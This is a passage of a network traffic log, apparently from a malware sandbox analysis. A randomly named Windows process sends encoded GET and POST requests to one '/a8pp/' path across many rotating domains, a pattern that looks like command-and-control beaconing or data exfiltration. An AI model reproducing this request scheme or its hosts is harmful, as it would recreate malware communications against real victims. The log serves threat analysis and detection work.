                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8= [TRUNCATED]
                                        Jun 4, 2024 14:37:58.159210920 CEST | 1176 | IN | HTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:37:58 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        52 | 192.168.11.30 | 49846 | 192.207.62.21 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:00.679064989 CEST | 465 | OUT | GET /a8pp/?2NlhHLS8=OIafhQlqd3+U0X685uCjXpA/yYYLTXRf5vcl7I4tT0pe2zvQLHkCRhCjRsaaEiaqAczN9yym/x5p7g+8tSCureiRSn+8K4wSoicHodjwuTrKVPMbvJXSPao=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:38:00.849019051 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:38:00 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Data Ascii: 5fb<!doctype html><html><head><meta charset="utf-8"><title></title><style>*{margin:0;padding:0;color:#444}body{font-size:14px;font-family:""}.main{width:600px;margin:10% auto;}.title{background: #20a53a;color: #fff;font-size: 16px;height: 40px;line-height: 40px;padding-left: 20px;}.content{background-color:#f3f7f9; height:280px;border:1px dashed #c6d9b6;padding:20px}.t1{border-bottom: 1px dashed #c6d9b6;color: #ff4000;font-weight: bold; margin: 0 0 20px; padding-bottom: 18px;}.t2{margin-bottom:8px; font-weight:bold}ol{margin:0 0 20px 22px;padding:0;}ol li{line-height:30px}</style></head><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KPvSogiWixBEEhWI",ck:"KPvSogiWixBEEhWI"})</script><body><div class="main"><div class="title"></div><div class="content"><p class="t1"></p><p class="t2"> [TRUNCATED]
                                        Jun 4, 2024 14:38:00.849031925 CEST | 447 | IN | Data Ascii: ><p class="t2"></p><ol><li></li><li></li><li></li></ol></div></div></body><scrip
                                        Jun 4, 2024 14:38:00.849209070 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        53 | 192.168.11.30 | 49847 | 91.195.240.19 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:09.145692110 CEST | 466 | OUT | GET /a8pp/?2NlhHLS8=/NPZ6ym1eSqP6E/qwOmQvYjKsz7zkRsccrcByesNZAVEstX0SolnWK8jgzxt8MISaNzEdIb6rnMbXZkqzFIAORFEfuZ8IH0a3kCasVRTZJxsOlTMl/y3o9s=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.peptily.shop
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:38:09.372328997 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        54 | 192.168.11.30 | 49848 | 34.120.137.41 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:14.501797915 CEST | 757 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Origin: http://www.blissfulbooks.online
                                        Referer: http://www.blissfulbooks.online/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=m21IDBRTC8aHU7DKxbsU78sUgf+rBdeRSmR7bAd9IFGHhpBIazCSPBANT/EMqOw/JD/Om2eVP0+tqcgCbNazj3PLGfc545gN8+WZUwXVhix8Jz5z36fCR12CZbg7BS37rbiIA1HOgke6++gxYJZK2tJPZrCKqoVRaMOkdQR3jS9JKrYeybmIDn14ee0OUmP4Hg==
                                        Jun 4, 2024 14:38:14.649626017 CEST | 462 | IN | HTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:38:14 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge3
                                        Via: 1.1 google
                                        Connection: close
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        55 | 192.168.11.30 | 49849 | 34.120.137.41 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:17.141961098 CEST | 777 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Origin: http://www.blissfulbooks.online
                                        Referer: http://www.blissfulbooks.online/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=m21IDBRTC8aHVf/K07QUsssLlf+rP9eVShZ7bBY2Iw2HmLpIZyCSKBANbfEJ3ew0JCC7m3yVP06tqZECb62yinPNO/c72ZgN8+WZUwD7hi58JCJz2f/NS12Babg7Ti33rbiuAxGbgmW6+/QxbYZFlNJJULCZ65kcddKPWg9EpxZgCcpEvYSKQHJVCfZmWkOjaqKLnXXeJxxIVDbi71a07WA=
                                        Jun 4, 2024 14:38:17.288959980 CEST | 462 | IN | HTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:38:17 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge2
                                        Via: 1.1 google
                                        Connection: close
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        56 | 192.168.11.30 | 49850 | 34.120.137.41 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:19.781563997 CEST | 1694 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Origin: http://www.blissfulbooks.online
                                        Referer: http://www.blissfulbooks.online/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:38:19.925964117 CEST | 462 | IN | HTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:38:19 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge1
                                        Via: 1.1 google
                                        Connection: close
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        57 | 192.168.11.30 | 49851 | 34.120.137.41 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:22.421736956 CEST | 474 | OUT | GET /a8pp/?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:38:22.571403980 CEST | 606 | IN | HTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:38:22 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge2
                                        Via: 1.1 google
                                        Connection: close
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        58 | 192.168.11.30 | 49852 | 160.124.114.188 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:27.917610884 CEST | 760 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Origin: http://www.click-advertising.net
                                        Referer: http://www.click-advertising.net/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=OdFYfX3EC+v3QkYvstgozG6O2Xc35cGwp/TKSfK+Ed7sSUsUWxxNYwieS7Mw7agQrvqj4dWcmrwKudb36t77viw/QlFouBx2RMt1th5Joy2aJY1ECjk8b/nLtsZEc2TyoYolrF4MGlh5j2J8eRF58ih9LBb2cR8D6z7JCmC2VscsTDFG06ctxyq6HSFq8LxyNg==
                                        Jun 4, 2024 14:38:28.261450052 CEST | 381 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:38:28 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        59 | 192.168.11.30 | 49853 | 160.124.114.188 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:30.755244017 CEST | 780 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Origin: http://www.click-advertising.net
                                        Referer: http://www.click-advertising.net/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=OdFYfX3EC+v3RFovuO4o1m6N53c328G0p/fKSe+uDojsL2kUX1tNZwieGrM1j6gPrvnc4cqcmr0KufT36aP8sSw9LVFmxxx2RMt1thtvozeaIrtEQXw/TfnE78ZEY2TuoYp2rEkqGg95j358fEp+vCh7GhaXURoP+iK+Dh+DVdUrSU0cp5oviSWXbToC+JwpQojshxIZjPOLIsUz0li7eBg=
                                        Jun 4, 2024 14:38:31.068583965 CEST | 381 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:38:30 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        60 | 192.168.11.30 | 49854 | 160.124.114.188 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:33.595810890 CEST | 1697 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Origin: http://www.click-advertising.net
                                        Referer: http://www.click-advertising.net/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:38:33.906240940 CEST | 381 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:38:33 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        61 | 192.168.11.30 | 49855 | 160.124.114.188 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:36.478188992 CEST | 475 | OUT | GET /a8pp/?2NlhHLS8=Dft4chLLB7HQRgI1kvQb3UGdiigcwJaJso3MJc+IJoTJW0I2amM0Xj+YeLw4jIoNvtXY/7GemIMI+dXc5vnp9QE1cggkijBoQvQelzZ8ig3DEoIcGDshdqY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:38:36.798222065 CEST | 355 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:38:36 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Data Ascii: a3<title>-</title><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><script src="/js.js"></script>0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        62 | 192.168.11.30 | 49856 | 91.195.240.19 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:42.041404009 CEST | 769 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Origin: http://www.continentaloilandgas.com
                                        Referer: http://www.continentaloilandgas.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=TVLbZXn3Qe4MBnbh6NgGcgpncDw+Jdb6+xyl6FZfryBSmIOPEBH+WmA8bOI2vQ1qxM+3aV01hsGgb2Su682ZM4GAS6ijceG9dufwc5cUNrWGxGyOjIBaq0dp/CXuE6H+mSihf0naWXxWLI7wWC47c0/J+8MjtvM0/7mysbzapqBfXsScywa7Oi1BaX2CXoKaPA==
                                        Jun 4, 2024 14:38:42.268013000 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        63 | 192.168.11.30 | 49857 | 91.195.240.19 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:44.789134979 CEST | 789 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Origin: http://www.continentaloilandgas.com
                                        Referer: http://www.continentaloilandgas.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=TVLbZXn3Qe4MDHrh5u4GeApgZDw+cNb++x+l6H1PrhlSnqWPWUz+XmA8VuI5hw0kxMyRaUY1hsCgbyWu6N2WMoGCZailDuG9dufwc44uNq+GxWCOycUMp0cb6CXuJaH6mSiff1qPWVZWLM/wRWM4S0/LgMNusf5s06jGg4Pis7x2S7jGvzu5dCJsGWbqVqLBSIVPZPjnjtIh9DR/mGPs1Ek=
                                        Jun 4, 2024 14:38:45.014115095 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        64 | 192.168.11.30 | 49858 | 91.195.240.19 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:47.542704105 CEST | 1706 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Origin: http://www.continentaloilandgas.com
                                        Referer: http://www.continentaloilandgas.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8= [TRUNCATED]
                                        Jun 4, 2024 14:38:47.771619081 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        65 | 192.168.11.30 | 49859 | 91.195.240.19 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:50.305811882 CEST | 478 | OUT | GET /a8pp/?2NlhHLS8=eXj7agnwQ7UtDQTI2/QeRjNOKmxKRYHEwlq+kXNt3DleoKuUYGucHmIzSo9PpxNipdSpHjsdoNiIZ3Hh69GYDO27Wp3lPM6WDcDlV706K5XwonPjk8UKoRY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:38:50.532887936 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        66 | 192.168.11.30 | 49860 | 172.67.205.56 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:55.664139986 CEST | 760 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Origin: http://www.barrettdigitalart.com
                                        Referer: http://www.barrettdigitalart.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=Mt643xzJw6Im90pFe0zzX1IR+lFqGHkgxqRUH7affZJ31vzisjdqwWy899f3lD/7VcoryKepmt7qtOWNoTSk3gOOOsuflgSxTyUEvizhyw6DJ6TgkH2iZSfxDAzwokfUvDqWqiPnElobaspv7FayN7J2JqAACp5k8i0t88WixDldndQjWlWEsM1GC3Ornq2hyA==
                                        Jun 4, 2024 14:38:55.853091955 CEST | 816 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:38:55 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cVYIeUgeJM2iSerEYXbiCBNgvROa2HKaTzGuckGW%2BIDT%2B%2FKFsNa3MPvAsQqQ3A58M7QckRIKFeEIMgcnJks0FI86emKaFL0QqSYHkZefh%2F6%2FNRXxXus%2FlbwapIICfchqKJGvLHbpGyOsqxOQ"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7fb964f03674e-ATL
                                        alt-svc: h3=":443"; ma=86400
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:38:55.853205919 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        67 | 192.168.11.30 | 49861 | 172.67.205.56 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:38:58.317362070 CEST | 780 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Origin: http://www.barrettdigitalart.com
                                        Referer: http://www.barrettdigitalart.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
